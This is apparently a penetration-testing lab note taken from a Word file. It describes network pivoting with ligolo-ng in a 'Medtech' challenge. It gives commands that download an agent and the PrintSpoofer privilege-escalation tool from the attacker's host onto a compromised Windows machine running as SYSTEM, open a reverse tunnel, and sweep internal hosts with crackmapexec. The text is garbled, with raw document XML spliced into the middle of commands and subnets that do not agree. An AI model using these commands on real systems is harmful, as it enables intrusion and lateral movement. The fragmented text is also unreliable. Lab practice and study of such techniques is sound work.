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https://github.com/nicocha30/ligolo-ng/releases/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version 0.6.2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https://github.com/nicocha30/ligolo-ng/releases/tag/v0.6.2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References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https://www.youtube.com/watch?v=DM1B8S80EvQ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https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740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172.16.205.254 /16 255.255.0.0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172.16.205.0/24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Creating the interface in my kali machine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ip tuntap add user kali mode tun ligolo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ip link set ligolo up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Enabling proxy server on kali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┌──(kali㉿kali)-[~/Medtech-Challenge1/Medtech121]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└─$ ./proxy -selfcert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WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!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WARN[0000] Using self-signed certificates   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ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate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WARN[0000] TLS Certificate fingerprint for ligolo is: 6676687E9891FD987C0DC50E002F0A20DC29358C196A38392FE1E1ACA3C88D0C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INFO[0000] Listening on 0.0.0.0:11601           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Moving the agent and run it Windows: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iwr -uri http://192.168.45.175/agent.exe -UseBasicParsing -Outfile agent.exe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PS C:\tools&gt; .\agent.exe -connect 192.168.45.175:11601 -ignore-cert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.\agent.exe -connect 192.168.45.175:11601 -ignore-cert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time="2024-09-04T19:15:52-07:00" level=warning msg="warning, certificate validation disabled"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time="2024-09-04T19:15:52-07:00" level=info msg="Connection established" addr="192.168.45.175:11601"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Adding the route in kali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sudo ip route add 172.16.205.0/24 dev ligolo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route table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ip route list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back to the ligolo session and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command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[Agent : NT AUTHORITY\SYSTEM@WEB02] » start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[Agent : NT AUTHORITY\SYSTEM@WEB02] » INFO[1351] Starting tunnel to NT AUTHORITY\SYSTEM@WEB02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Validating the tunnel with crackmapexec against the network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┌──(kali㉿kali)-[~/Medtech-Challenge1]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└─$ crackmapexec smb 172.16.162.0/24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┌──(kali㉿kali)-[~/Medtech-Challenge1]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└─$ crackmapexec smb 172.16.162.0/24            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SMB         172.16.162.6    445    DC02             [*] Windows 10.0 Build 20348 x64 (name:DC02) (domain:relia.com) (signing:True) (SMBv1:False)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SMB         172.16.162.30   445    WEBBY            [*] Windows 10.0 Build 20348 x64 (name:WEBBY) (domain:relia.com) (signing:False) (SMBv1:False)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SMB         172.16.162.10   445    DC01             [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:medtech.com) (signing:True) (SMBv1:False)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SMB         172.16.162.7    445    INTRANET         [*] Windows 10.0 Build 20348 x64 (name:INTRANET) (domain:relia.com) (signing:False) (SMBv1:False)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SMB         172.16.162.5    445    MAIL             [*] Windows 10.0 Build 20348 x64 (name:MAIL) (domain:relia.com)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iwr -uri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http://192.168.45.182/PrintSpoofer64.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Outfile PrintSpoofer64.exe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iwr -uri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http://192.168.45.182/agent.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Outfile agent.exe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iwr -uri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http://192.168.45.182/agent.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -UseBasicParsing -Outfile agent.exe -ErrorAction Silently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found is to disable rhe progress bar. To disable the progress bar,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$ProgressPreference = "SilentlyContinue"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.\agent.exe -connect 192.168.45.182:11601 -ignore-cert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192.168.45.182/agent.exe" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.182/PrintSpoofer64.exe" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.182/agent.exe" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e74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icocha30/ligolo-ng/releases/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nicocha30/ligolo-ng/releases/tag/v0.6.2" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=DM1B8S80Ev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